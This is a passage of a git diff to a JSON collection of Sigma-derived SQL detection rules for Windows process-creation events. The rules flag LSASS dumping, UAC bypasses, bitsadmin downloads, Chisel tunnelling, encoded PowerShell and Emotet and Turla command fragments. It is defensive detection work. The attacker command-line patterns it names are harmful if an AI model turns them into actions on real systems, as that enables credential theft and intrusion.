LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * 
FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { "title": "Fireball Archer Install", 
@@ -10487,241 +10124,222 @@ "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", - "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' 
ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. 
This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "status": "experimental", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ 
- "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", - "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE 
'%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' 
ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "status": "experimental", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by 
raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": 
"experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious PrinterPorts Creation 
(CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Boot 
Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - 
"Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ + "attack.t1112", "attack.defense_evasion" ], "falsepositives": [ 
@@ -10729,497 +10347,529 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", + "title": "Suspicious Desktopimgdownldr Command", + "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "status": "test", + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "False positives depend on scripts and administrative tools used 
in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" + "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" }, { - "title": "Rundll32 Execution Without Parameters", - "id": "5bb68627-3198-40ca-b458-49f973db8752", - "status": "test", - "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", - "author": "Bartlomiej Czyz, Relativity", + "title": "TropicTrooper Campaign November 2018", + "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", + "status": "stable", + "description": "Detects TropicTrooper activity, an actor who targeted 
high-profile organizations in the energy and food and beverage sectors in Asia", + "author": "@41thexplorer, Microsoft Defender ATP", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", "attack.execution", - "attack.t1569.002" - ], - "falsepositives": [ - "False positives may occur if a user called rundll32 from CLI with no options" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_without_parameters.yml" + "filename": "proc_creation_win_apt_tropictrooper.yml" }, { - "title": "Phishing Pattern ISO in Archive", - "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "title": "Microsoft IIS Connection Strings Decryption", + "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "status": "experimental", - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
